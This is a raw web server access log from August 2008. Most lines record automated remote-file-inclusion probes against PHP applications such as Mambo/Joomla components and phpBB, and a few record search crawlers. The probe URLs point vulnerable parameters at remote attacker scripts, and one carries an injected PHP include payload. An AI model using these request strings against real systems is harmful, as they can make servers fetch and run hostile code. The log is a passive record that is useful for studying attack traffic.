64.185.237.191 - - [21/Aug/2008:10:11:04 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:11:05 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9952 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:11:08 -0700] "GET /logs/access_080319.log//modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:11:21 -0700] "GET /logs/access_080717.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:11:21 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:10:11:22 -0700] "GET /logs/access_080621.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:11:24 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:10:13:07 -0700] "GET /logs/access_080730.log/!rfihttp://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:13:40 -0700] "GET /logs/errors.php?error=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:13:54 -0700] "GET /logs/access_070831.log HTTP/1.0" 200 35113 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:10:14:23 -0700] "GET /logs/access_080722.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:10:14:29 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:14:30 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:14:31 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:14:34 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:10:14:34 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:14:40 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:14:40 -0700] "GET /logs/access_080616.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:14:40 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:14:40 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:14:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:14:41 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9952 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.111.176.88 - - [21/Aug/2008:10:14:41 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:14:53 -0700] "GET /logs/access_080717.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.5.54.215 - - [21/Aug/2008:10:15:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:15:28 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:15:29 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:15:44 -0700] "GET /logs/access_080724.log//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:15:44 -0700] "GET //include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:15:44 -0700] "GET /logs//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:16:03 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:16:05 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:16:37 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:16:38 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:16:48 -0700] "GET /logs/access_080810.log/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:16:49 -0700] "GET /?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9877 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:16:50 -0700] "GET /logs/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 61570 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:10:16:54 -0700] "GET /logs/access_080530.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:10:16:58 -0700] "GET /logs/access_080527.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.215 - - [21/Aug/2008:10:17:26 -0700] "GET //lib/static/header.php?set_menu=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.5.54.215 - - [21/Aug/2008:10:17:27 -0700] "GET /logs//lib/static/header.php?set_menu=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:17:32 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:17:32 -0700] "GET //include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:17:32 -0700] "GET /logs//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.5.54.215 - - [21/Aug/2008:10:18:13 -0700] "GET /logs//palportal/index.php?page=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
72.5.54.215 - - [21/Aug/2008:10:18:13 -0700] "GET //palportal/index.php?page=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
38.103.63.59 - - [21/Aug/2008:10:18:15 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.103.63.59 - - [21/Aug/2008:10:18:24 -0700] "GET /logs/access_071228.log HTTP/1.1" 200 327680 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
38.103.63.59 - - [21/Aug/2008:10:18:32 -0700] "GET /logs/access_080117.log HTTP/1.1" 200 327680 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:18:39 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:10:18:39 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.215 - - [21/Aug/2008:10:18:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:18:46 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:19:30 -0700] "GET /logs/access_080501.log/avatar.php?page=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:19:30 -0700] "GET /avatar.php?page=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:19:30 -0700] "GET /logs/access_080406.log/avatar.php?page=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:19:32 -0700] "GET /logs/avatar.php?page=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:19:36 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:19:37 -0700] "GET /logs/access_080402.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [21/Aug/2008:10:19:37 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:21:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:21:04 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:21:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:21:07 -0700] "GET /logs/access.log/avatar.php?page=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:21:26 -0700] "GET /logs/access_080510.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:22:19 -0700] "GET /logs/access_080718.log//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:10:22:26 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:22:31 -0700] "GET /logs/access_080401.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:22:35 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:22:35 -0700] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:22:51 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:22:53 -0700] "GET /index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9902 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:22:57 -0700] "GET /logs/access_080718.log//include/lib.inc.php?site_path=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:23:10 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:23:10 -0700] "GET /logs/access_080401.log///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:23:11 -0700] "GET ///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:10:23:11 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:10:23:12 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:23:12 -0700] "GET /logs/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:23 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:23:40 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:48 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:23:50 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:23:51 -0700] "GET /logs/access_080807.log/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:23:53 -0700] "GET /logs/index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:23:53 -0700] "GET /index.php?inc=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9902 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:24:06 -0700] "GET /logs/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:24:06 -0700] "GET /logs/access_080806.log/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:24:07 -0700] "GET /logs/access_080810.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:24:07 -0700] "GET /index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9906 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:24:08 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9915 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:24:08 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:24:13 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [21/Aug/2008:10:24:13 -0700] "GET /logs/access_080404.log/index.php?pag=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:24:17 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:24:41 -0700] "GET /logs/access_080810.log/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:24:42 -0700] "HEAD /retreat1/webcam/retreat1_00451.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:24:42 -0700] "GET /retreat1/webcam/retreat1_00451.jpg HTTP/1.1" 200 56535 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:24:42 -0700] "GET /?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9877 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [21/Aug/2008:10:24:42 -0700] "GET /logs/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 61570 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:24:43 -0700] "GET /logs/access_080702.log//SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:24:47 -0700] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:24:58 -0700] "GET //SQuery/lib/gore.php?libpath=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
